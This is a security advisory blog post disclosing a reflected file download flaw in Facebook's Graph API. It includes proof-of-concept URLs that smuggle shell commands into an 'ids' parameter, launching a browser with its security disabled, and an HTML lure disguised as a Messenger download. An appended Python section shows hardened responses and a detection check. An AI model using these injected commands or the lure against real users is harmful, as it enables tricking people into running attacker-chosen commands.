Facebook RFD: The final chapter

WS201505 – Facebook RFD: The final chapter
by David Sopas @dsopas
www.websegura.net

Description:

I already published a security advisory about two RFDs I found on Facebook, but I discovered one more, and this one is more dangerous because it requires no authentication at all: no access_token, no api_key, not even a Facebook account.

In Internet Explorer 9 you just need to run the URL:

http://graph.facebook.com/run.bat?ids=http://www.websegura.net/%22||start iexplore.exe websegura.net/malware.htm||

It downloads the file run.bat, which launches Internet Explorer and opens a websegura.net page that could be malicious [it isn't; it only shows text].

[Screenshot: facebook_rfd_ie9]

On the latest versions of Chrome, Opera, Android Browser and Chrome for Android you need to visit a page:

https://www.facebook.com/l.php?u=http://www.websegura.net/fb.htm&h=mAQHgtP_E

Which contains the following code:

<h1>As you may notice it will download a file stored in Facebook.com</h1>
<a href="http://graph.facebook.com/run.bat?ids=%68%74%74%70%3A%2F%2F%77%77%77%2E%77%65%62%73%65%67%75%72%61%2E%6E%65%74%2F%22||start chrome websegura.net/malware.htm --disable-web-security --disable-popup-blocking||" download="run.bat">Facebook Messenger Download</a>

In the above example it downloads the file run.bat, which launches Google Chrome with its security settings disabled and opens a websegura.net page that could be malicious [it isn't; it only shows text].

I made a small video to better describe this proof-of-concept:

Also I made a screenshot using the Opera browser:

[Screenshot: facebook_opera_rfd]

On Firefox you just need to add some JavaScript to the HTML code above, onclick="return false;", because Firefox still doesn't support the HTML5 download attribute.
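As an added defender-side example (not part of the original advisory and not Facebook's code), here is a constructed stand-in for a JSON API that echoes a caller-supplied ids value into its error message, rendered in its vulnerable and hardened forms, plus a check for the three response properties that make a reflected file download possible. The endpoint shape, the header values and the rfd_findings helper are assumptions for illustration.

```python
import json
import re

# Constructed stand-in for a JSON API that echoes a caller-supplied "ids"
# value in its error message; NOT Facebook's real response format.
SAFE_ID = re.compile(r"[A-Za-z0-9._:/-]+")
SHELL_META = set('"|&;<>`$\r\n')  # characters cmd.exe/sh treat as syntax

def render_lookup_response(ids: str, hardened: bool) -> tuple[dict, str]:
    """Return (headers, body) for a failed lookup of `ids`."""
    headers = {"Content-Type": "application/json; charset=utf-8"}
    if not hardened:
        # Vulnerable shape: the input comes straight back. JSON escaping turns
        # " into \" but cmd.exe still sees a quote followed by the || operator,
        # and with no Content-Disposition the browser names the download from
        # the URL path (e.g. run.bat), which is exactly what RFD needs.
        return headers, json.dumps({"error": {"message": f"unknown alias: {ids}"}})
    # 1. Reflect only values that cannot double as shell syntax.
    if SAFE_ID.fullmatch(ids):
        body = json.dumps({"error": {"message": f"unknown alias: {ids}"}})
    else:
        body = json.dumps({"error": {"message": "unknown alias"}})
    # 2. Pin the download name so the URL path can never choose it.
    headers["Content-Disposition"] = 'attachment; filename="response.json"'
    # 3. Stop MIME sniffing so the body is not reinterpreted as another type.
    headers["X-Content-Type-Options"] = "nosniff"
    return headers, body

def _strings(node):
    """Yield every string value inside a decoded JSON document."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        yield from (s for v in node.values() for s in _strings(v))
    elif isinstance(node, list):
        yield from (s for v in node for s in _strings(v))

def rfd_findings(headers: dict, body: str, sent: str) -> list[str]:
    """Defender-side check: list the RFD preconditions a response exhibits."""
    findings = []
    if "filename=" not in headers.get("Content-Disposition", ""):
        findings.append("no fixed filename: browser takes it from the URL path")
    if headers.get("X-Content-Type-Options") != "nosniff":
        findings.append("content type can be sniffed")
    echoed = any(sent in s for s in _strings(json.loads(body)))
    if echoed and SHELL_META & set(sent):
        findings.append("shell metacharacters reflected verbatim")
    return findings
```

Running rfd_findings against a real response from a proxy capture is a quick way to triage whether an endpoint that reflects input is also exposed to RFD.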

There are still more RFDs, but I think Facebook got the idea and might be tired of receiving my emails, so I hope that someday they really understand the security risks that this type of vulnerability brings to all users.

Update (11 Mar 2015):

Facebook just replied:

Thank you for sharing this information with us. Although this issue does not qualify as a part of our bounty program, we appreciate your report. We will follow up with you on any security bugs or with any further questions we may have.
